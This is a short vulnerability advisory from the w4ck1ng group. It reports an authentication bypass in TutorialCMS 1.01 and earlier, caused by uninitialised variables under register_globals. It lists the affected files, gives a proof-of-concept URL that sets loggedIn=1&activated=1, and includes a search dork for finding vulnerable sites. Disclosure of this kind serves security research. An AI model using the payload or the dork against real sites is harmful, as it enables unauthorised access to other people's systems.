TutorialCMS versions 1.01 and below suffer from an authentication bypass vulnerability.
a07951fc5266415f66cf3c33cea26d50d130ac95fb053f6081b110e3670cc2b3
#################################################################################
# #
# TutorialCMS <= 1.01 Authentication Bypass #
# #
# Discovered by: Silentz #
# Payload: Authentication Bypass #
# Website: https://www.w4ck1ng.com #
# #
# Vulnerability: #
# #
# Variables $loggedIn & $activated are not predefined. #
# #
# Vulnerable Files: #
# #
# login.php #
# headerLinks.php #
# submit1.php #
# myFav.php #
# userCP.php #
# #
# #
# PoC: https://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1 #
# #
# Subject To: register_globals set to on #
# GoogleDork: "Powered By Photoshop Tutorials" #
# #
# Shoutz: The entire w4ck1ng community #
# #
# Notes to developers: #
# #
# You should allways fully disclose the vulnerabilities before someone #
# else does, just looks better. Also, try changing the "Date Modified" #
# stamp on the files before you wrap it up for upload ;) #
# #
#################################################################################